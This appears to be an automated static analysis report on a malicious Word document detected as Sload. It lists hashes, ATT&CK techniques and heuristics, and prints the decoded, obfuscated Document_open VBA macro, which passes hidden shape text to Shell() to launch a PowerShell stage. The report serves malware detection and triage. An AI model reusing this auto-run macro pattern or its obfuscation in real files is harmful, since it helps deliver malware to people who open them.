Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0b020582bc52b3ba…

MALICIOUS

Office (OLE)

79.9 KB Created: 2018-11-08 15:35:00 Authoring application: Microsoft Office Word First seen: 2018-11-13
MD5: 56aa35265a61eadbe62b63055f4570ad SHA-1: 7f3e5253cd9ada3e50c91a032c31bd6b4e81058f SHA-256: 0b020582bc52b3ba14735bb2ebcd403fd4427cc3d8730020b3870e8ee1d5d3e2
272 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that utilizes the Shell() function to execute a complex, obfuscated PowerShell command. This command appears to download and decompress a payload from a Base64 encoded string, then execute it. The presence of multiple high and critical heuristics related to VBA macros, Shell() calls, and PowerShell invocation strongly indicates malicious intent. The execution of the PowerShell command is the primary mechanism for delivering the next stage of the attack.

Heuristics 9

  • ClamAV: Doc.Malware.Sload-6797105-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sload-6797105-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       FormatDateTime (QHNopj + APsjMf / (LiGWQB + wfvnsd + uuNwCz + EqTbwz / (nGJdK + jYwEo)))
RpISbwrES = Shell("" + cRAzCA + ikJfEG + Shapes(vRDSKZm + FwWwJHl + 1 + cZSiww + bYUfTZ).TextFrame.TextRange.Text + JXNhH + rPzEkWV, 978743524 - 978743524)
   TimeValue fliSU + VHPsz + pCmWp + zjXSKZ + bOzsSv + vvAhv + psBGS + FRBNK - uhVtAN + FYsCWO
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1298 bytes
SHA-256: a5cf6d82c9fbc7593c40b5be653635cc6ba00b747c00cf7cdfcdd91c1fd4ce89
Detection
ClamAV: No threats found
Obfuscation or payload: likely
35 of 68 identifiers look randomly generated (e.g. 'RpISbwrES'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "drDjoTIjj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   FormatNumber iHjDm + qCWsz * ruaCM + JVuKA * PYiIw + irfwDB - sYGUf + aEAAl + naopN + YHMnO
   TimeValue ZvalC + QQGjSS + GHYVS + OWdVq + HBEtP + rVFIqO / (RtSmj + owsMj + LTDThw + jkvwMW * (pazzwR + LAfwk + OCCOpU + EaoBXM))
   FormatNumber EbNFYs + YvUvDB / naPPX + ELTqCR + futEKi + buMwbH
   TimeValue (rGslMH + hzYqfc + IXCHRL + CPlVOo) + (NQnPzY + MzRFU + NwfTCJ + movUqj - prGQz + qTjlb)
   FormatNumber (WzFPt + NAtNS + zSXWzB + hijGs) + mOmvb + Bdmdiq - BwoBU + CMEIQi + KDwqqq + rGCaF
   FormatDateTime (QHNopj + APsjMf / (LiGWQB + wfvnsd + uuNwCz + EqTbwz / (nGJdK + jYwEo)))
RpISbwrES = Shell("" + cRAzCA + ikJfEG + Shapes(vRDSKZm + FwWwJHl + 1 + cZSiww + bYUfTZ).TextFrame.TextRange.Text + JXNhH + rPzEkWV, 978743524 - 978743524)
   TimeValue fliSU + VHPsz + pCmWp + zjXSKZ + bOzsSv + vvAhv + psBGS + FRBNK - uhVtAN + FYsCWO
   FormatNumber (rStCFb + zHiRzv + cZAoK + NkBvm - ppwpf + WTOzIL + (GThOL + OfkvSB + EYiGRz + zllDR))
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.